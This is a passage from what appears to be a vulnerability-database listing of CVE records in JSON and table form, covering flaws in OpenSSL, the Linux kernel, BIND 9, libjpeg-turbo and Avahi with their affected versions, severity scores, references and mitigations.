DH_check_pub_key() are also called by a number of\u003cbr\u003eother OpenSSL functions. An application calling any of those other\u003cbr\u003efunctions may similarly be affected. The other functions affected by this\u003cbr\u003eare DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate().\u003cbr\u003e\u003cbr\u003eAlso vulnerable are the OpenSSL pkey command line application when using the\u003cbr\u003e\"-pubcheck\" option, as well as the OpenSSL genpkey command line application.\u003cbr\u003e\u003cbr\u003eThe OpenSSL SSL/TLS implementation is not affected by this issue.\u003cbr\u003e\u003cbr\u003eThe OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.\u003cbr\u003e\u003cbr\u003e" } ], "value": "Issue summary: Generating excessively long X9.42 DH keys or checking\nexcessively long X9.42 DH keys or parameters may be very slow.\n\nImpact summary: Applications that use the functions DH_generate_key() to\ngenerate an X9.42 DH key may experience long delays. Likewise, applications\nthat use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check()\nto check an X9.42 DH key or X9.42 DH parameters may experience long delays.\nWhere the key or parameters that are being checked have been obtained from\nan untrusted source this may lead to a Denial of Service.\n\nWhile DH_check() performs all the necessary checks (as of CVE-2023-3817),\nDH_check_pub_key() doesn\u0027t make any of these checks, and is therefore\nvulnerable for excessively large P and Q parameters.\n\nLikewise, while DH_generate_key() performs a check for an excessively large\nP, it doesn\u0027t check for an excessively large Q.\n\nAn application that calls DH_generate_key() or DH_check_pub_key() and\nsupplies a key or parameters obtained from an untrusted source could be\nvulnerable to a Denial of Service attack.\n\nDH_generate_key() and DH_check_pub_key() are also called by a number of\nother OpenSSL functions. An application calling any of those other\nfunctions may similarly be affected. The other functions affected by this\nare DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate().\n\nAlso vulnerable are the OpenSSL pkey command line application when using the\n\"-pubcheck\" option, as well as the OpenSSL genpkey command line application.\n\nThe OpenSSL SSL/TLS implementation is not affected by this issue.\n\nThe OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "LOW" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-606", "description": "CWE-606 Unchecked Input for Loop Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:53.778Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20231106.txt" }, { "name": "1.0.2zj git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=34efaef6c103d636ab507a0cc34dca4d3aecc055" }, { "name": "1.1.1x git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=710fee740904b6290fef0dd5536fbcedbc38ff0c" }, { "name": "3.0.13 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db925ae2e65d0d925adef429afc37f75bd1c2017" }, { "name": "3.1.5 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ddeb4b6c6d527e54ce9a99cba785c0f7776e54b6" } ], "source": { "discovery": "UNKNOWN" }, "title": "Excessive time spent in DH check / generation with large Q parameter value", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-5678", "datePublished": "2023-11-06T15:47:30.795Z", "dateReserved": "2023-10-20T09:38:43.518Z", "dateUpdated": "2024-10-14T14:55:53.778Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6121
Vulnerability from cvelistv5
Published
2023-11-16 14:45
Modified
2024-11-15 15:12
Severity ?
EPSS score ?
Summary
An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data being printed and potentially leaked to the kernel ring buffer (dmesg).
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6121 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2250043 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-6121", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-26T15:58:53.623448Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-26T15:59:28.666Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:17.422Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6121" }, { "name": "RHBZ#2250043", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250043" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Alon Zahavi for reporting this issue." } ], "datePublic": "2023-11-06T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data being printed and potentially leaked to the kernel ring buffer (dmesg)." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Low" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:12:12.436Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6121" }, { "name": "RHBZ#2250043", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250043" } ], "timeline": [ { "lang": "en", "time": "2023-11-12T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-11-06T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: nvme: info leak due to out-of-bounds read in nvmet_ctrl_find_get", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by explicitly setting the kernel parameter to restrict unprivileged users from using dmesg:\n```\nsudo sysctl -w kernel.dmesg_restrict=1\n```\nTo make it persistent between system reboots:\n```\necho \u0027kernel.dmesg_restrict=1\u0027 | sudo tee -a /etc/sysctl.conf\n```" } ], "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6121", "datePublished": "2023-11-16T14:45:38.430Z", "dateReserved": "2023-11-14T10:18:51.337Z", "dateUpdated": "2024-11-15T15:12:12.436Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-31083
Vulnerability from cvelistv5
Published
2023-04-24 00:00
Modified
2024-08-02 14:45
Severity ?
EPSS score ?
Summary
An issue was discovered in drivers/bluetooth/hci_ldisc.c in the Linux kernel 6.2. In hci_uart_tty_ioctl, there is a race condition between HCIUARTSETPROTO and HCIUARTGETPROTO. HCI_UART_PROTO_SET is set before hu->proto is set. A NULL pointer dereference may occur.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T14:45:25.801Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/CA+UBctC3p49aTgzbVgkSZ2+TQcqq4fPDO7yZitFT5uBPDeCO2g%40mail.gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230929-0003/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9c33663af9ad115f90c076a1828129a3fbadea98" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1210780" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in drivers/bluetooth/hci_ldisc.c in the Linux kernel 6.2. In hci_uart_tty_ioctl, there is a race condition between HCIUARTSETPROTO and HCIUARTGETPROTO. HCI_UART_PROTO_SET is set before hu-\u003eproto is set. A NULL pointer dereference may occur." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:41:51.289728", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/all/CA+UBctC3p49aTgzbVgkSZ2+TQcqq4fPDO7yZitFT5uBPDeCO2g%40mail.gmail.com/" }, { "url": "https://security.netapp.com/advisory/ntap-20230929-0003/" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9c33663af9ad115f90c076a1828129a3fbadea98" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1210780" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-31083", "datePublished": "2023-04-24T00:00:00", "dateReserved": "2023-04-24T00:00:00", "dateUpdated": "2024-08-02T14:45:25.801Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4408
Vulnerability from cvelistv5
Published
2024-02-13 14:04
Modified
2024-08-02 07:24
Severity ?
EPSS score ?
Summary
The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers.
This issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.
References
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-4408", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-21T20:37:05.447060Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:27:16.918Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T07:24:04.673Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "CVE-2023-4408", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2023-4408" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/13/1" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0001/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "BIND 9", "vendor": "ISC", "versions": [ { "lessThanOrEqual": "9.16.45", "status": "affected", "version": "9.0.0", "versionType": "custom" }, { "lessThanOrEqual": "9.18.21", "status": "affected", "version": "9.18.0", "versionType": "custom" }, { "lessThanOrEqual": "9.19.19", "status": "affected", "version": "9.19.0", "versionType": "custom" }, { "lessThanOrEqual": "9.11.37-S1", "status": "affected", "version": "9.9.3-S1", "versionType": "custom" }, { "lessThanOrEqual": "9.16.45-S1", "status": "affected", "version": "9.16.8-S1", "versionType": "custom" }, { "lessThanOrEqual": "9.18.21-S1", "status": "affected", "version": "9.18.11-S1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "ISC would like to thank Shoham Danino from Reichman University, Anat Bremler-Barr from Tel-Aviv University, Yehuda Afek from Tel-Aviv University, and Yuval Shavitt from Tel-Aviv University for bringing this vulnerability to our attention." } ], "datePublic": "2024-02-13T00:00:00Z", "descriptions": [ { "lang": "en", "value": "The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers.\nThis issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1." } ], "exploits": [ { "lang": "en", "value": "We are not aware of any active exploits." } ], "impacts": [ { "descriptions": [ { "lang": "en", "value": "By flooding the target server with queries exploiting this flaw an attacker can significantly impair the server\u0027s performance, effectively denying legitimate clients access to the DNS resolution service." } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } } ], "providerMetadata": { "dateUpdated": "2024-02-13T14:04:17.519Z", "orgId": "404fd4d2-a609-4245-b543-2c944a302a22", "shortName": "isc" }, "references": [ { "name": "CVE-2023-4408", "tags": [ "vendor-advisory" ], "url": "https://kb.isc.org/docs/cve-2023-4408" }, { "url": "http://www.openwall.com/lists/oss-security/2024/02/13/1" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "url": "https://security.netapp.com/advisory/ntap-20240426-0001/" } ], "solutions": [ { "lang": "en", "value": "Upgrade to the patched release most closely related to your current version of BIND 9: 9.16.48, 9.18.24, 9.19.21, 9.16.48-S1, or 9.18.24-S1." } ], "source": { "discovery": "EXTERNAL" }, "title": "Parsing large DNS messages may cause excessive CPU load", "workarounds": [ { "lang": "en", "value": "No workarounds known." } ] } }, "cveMetadata": { "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22", "assignerShortName": "isc", "cveId": "CVE-2023-4408", "datePublished": "2024-02-13T14:04:17.519Z", "dateReserved": "2023-08-18T07:59:28.420Z", "dateUpdated": "2024-08-02T07:24:04.673Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29390
Vulnerability from cvelistv5
Published
2023-08-22 00:00
Modified
2024-10-04 16:11
Severity ?
EPSS score ?
Summary
libjpeg-turbo version 2.0.90 has a heap-based buffer over-read (2 bytes) in decompress_smooth_data in jdcoefct.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:02:51.858Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1943797" }, { "tags": [ "x_transferred" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/blob/4e52b66f342a803d3b8099b79607e3158d3a241c/jdcoefct.c#L595" }, { "tags": [ "x_transferred" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/commits/main/jdcoefct.c" }, { "name": "FEDORA-2023-d79ff22c5b", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/27NR3KG553CG6LGPMP6SHWEVHTYPL6RC/" }, { "name": "FEDORA-2023-3bfb63f6d2", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T655QF7CQ3DYAMPFV7IECQYGDEUIVVT/" }, { "name": "FEDORA-2023-b427f54e68", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2021-29390", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-04T16:08:32.914099Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-04T16:11:31.673Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "libjpeg-turbo version 2.0.90 has a heap-based buffer over-read (2 bytes) in decompress_smooth_data in jdcoefct.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-21T02:07:13.454726", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1943797" }, { "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/blob/4e52b66f342a803d3b8099b79607e3158d3a241c/jdcoefct.c#L595" }, { "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/commits/main/jdcoefct.c" }, { "name": "FEDORA-2023-d79ff22c5b", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/27NR3KG553CG6LGPMP6SHWEVHTYPL6RC/" }, { "name": "FEDORA-2023-3bfb63f6d2", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T655QF7CQ3DYAMPFV7IECQYGDEUIVVT/" }, { "name": "FEDORA-2023-b427f54e68", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-29390", "datePublished": "2023-08-22T00:00:00", "dateReserved": "2021-03-29T00:00:00", "dateUpdated": "2024-10-04T16:11:31.673Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38471
Vulnerability from cvelistv5
Published
2023-11-02 14:58
Modified
2024-08-29 14:17
Severity ?
EPSS score ?
Summary
A vulnerability was found in Avahi. A reachable assertion exists in the dbus_set_host_name function.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-38471 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2191691 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | n/a | avahi | |||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:39:13.630Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38471" }, { "name": "RHBZ#2191691", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191691" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38471", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T13:54:56.246487Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:17:30.825Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "avahi", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "avahi", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-04-26T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Avahi. A reachable assertion exists in the dbus_set_host_name function." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-617", "description": "Reachable Assertion", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-02T14:58:22.628Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38471" }, { 